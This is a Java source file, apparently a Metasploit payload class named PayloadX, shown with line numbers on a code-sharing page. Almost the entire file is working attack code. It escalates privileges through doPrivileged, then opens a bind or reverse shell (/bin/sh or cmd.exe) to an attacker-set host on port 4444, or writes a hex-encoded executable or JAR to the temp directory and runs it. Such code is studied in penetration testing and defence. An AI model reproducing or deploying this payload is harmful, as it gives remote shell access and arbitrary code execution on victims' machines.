Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package msf.x;
2

3
import java.io.BufferedReader;
4
import java.io.BufferedWriter;
5
import java.io.File;
6
import java.io.FileOutputStream;
7
import java.io.InputStream;
8
import java.io.InputStreamReader;
9
import java.io.OutputStream;
10
import java.io.OutputStreamWriter;
11
import java.net.ServerSocket;
12
import java.net.Socket;
13
import java.security.AccessController;
14
import java.security.PrivilegedExceptionAction;
15

16
public class PayloadX implements PrivilegedExceptionAction
17
{
18
	// This will contain a hex string of the native payload to drop and execute.
19
	public static String data = null;
20
	public static String jar = null;
21
	// If no native payload is set we get either a java bind shell or a java
22
	// reverse shell.
23
	public static String lhost = null;
24
	public static int lport = 4444;
25

26
	class StreamConnector extends Thread
27
	{
28
		InputStream is;
29
		OutputStream os;
30

31
		StreamConnector( InputStream is, OutputStream os )
32
		{
33
			this.is = is;
34
			this.os = os;
35
		}
36

37
		public void run()
38
		{
39
			BufferedReader in = null;
40
			BufferedWriter out = null;
41
			
42
			try
43
			{
44
				in = new BufferedReader( new InputStreamReader( is ) );
45
				out = new BufferedWriter( new OutputStreamWriter( os ) );
46
				char buffer[] = new char[8192];
47
				int length;
48
				while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
49
				{
50
					out.write( buffer, 0, length );
51
					out.flush();
52
				}
53
			}
54
			catch( Exception e ) {}
55

56
			try
57
			{
58
				if( in != null )
59
					in.close();
60
				if( out != null )
61
					out.close();
62
			}
63
			catch( Exception e ) {}
64
		}
65
	}
66

67
	// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
68
	public static byte[] StringToBytes( String s )
69
	{
70
		byte[] data = new byte[s.length() / 2];
71

72
		for( int i = 0 ; i < s.length() ; i += 2 )
73
			data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) );
74

75
		return data;
76
	}
77

78
	public Object run() throws Exception
79
	{
80
		//System.out.println("Running");
81
		// if the native payload data has not been set just return for now, it
82
		// will be set by the next time we reach here.
83
		if( PayloadX.data == null && PayloadX.jar == null )
84
			return null;
85
		//System.out.println("have either data or jar");
86
		
87
		try
88
		{
89
			String os = System.getProperty( "os.name" );
90

91
			//System.out.println("OS: " + os);
92
			// if we have no native payload to drop and execute we default to
93
			// either a TCP bind or reverse shell.
94
			if( PayloadX.data.length() == 0 && PayloadX.jar.length() == 0 )
95
			{
96
				//System.out.println("no, exe/jar. Doing shell");
97
				Socket client_socket = null;
98

99
				String shell = "/bin/sh";
100

101
				if( os.indexOf( "Windows" ) >= 0 )
102
					shell = "cmd.exe";
103

104
				if( PayloadX.lhost == null )
105
				{
106
					ServerSocket server_socket = new ServerSocket( PayloadX.lport );
107
					client_socket = server_socket.accept();
108
				}
109
				else
110
				{
111
					client_socket = new Socket( PayloadX.lhost, PayloadX.lport );
112
				}
113

114
				if( client_socket != null )
115
				{
116
					Process process = exec( shell );
117
					if( process != null )
118
					{
119
						( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
120
						( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
121
					}
122
				}
123
			}
124
			else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) )
125
			{
126
				//System.out.println("Dropping JAR");
127
				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar";
128

129
				writeFile( path, StringToBytes( PayloadX.jar ) );
130
				exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true");
131
			}
132
			else
133
			{
134
				//System.out.println("Dropping EXE");
135
				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe";
136

137
				writeFile( path, StringToBytes( PayloadX.data ) );
138
				if( os.indexOf( "Windows" ) < 0 )
139
				{
140
					exec( "chmod 755 " + path );
141
				}
142
				exec( path );
143
				new File( path ).delete();
144
			}
145
		}
146
		catch( Exception e ) {
147
			//System.out.println(e);
148
		}
149
		
150
		return null;
151
	}
152

153
	public Process exec( String path )
154
	{
155
		Process p = null;
156
		//System.out.println( "Executing" );
157
		try {
158
			p = Runtime.getRuntime().exec( path );
159
			if( p == null ) 
160
			{
161
				//System.out.println( "Null process, crap" ); 
162
			}
163
			p.waitFor();
164
		} catch( Exception e ) {
165
			//System.out.println(e);
166
		}
167
		return p;
168
	}
169

170
	public void writeFile( String path, byte[] data )
171
	{
172
		//System.out.println( "Writing file" );
173
		try {
174
			FileOutputStream fos = new FileOutputStream( path );
175

176
			fos.write( data );
177
			fos.close();
178
		} catch( Exception e ) {
179
			//System.out.println(e);
180
		}
181
	}
182
	
183
	public PayloadX()
184
	{
185
		try
186
		{
187
			AccessController.doPrivileged( this );
188
		}
189
		catch( Exception e ) {}
190
	}
191
}
192

193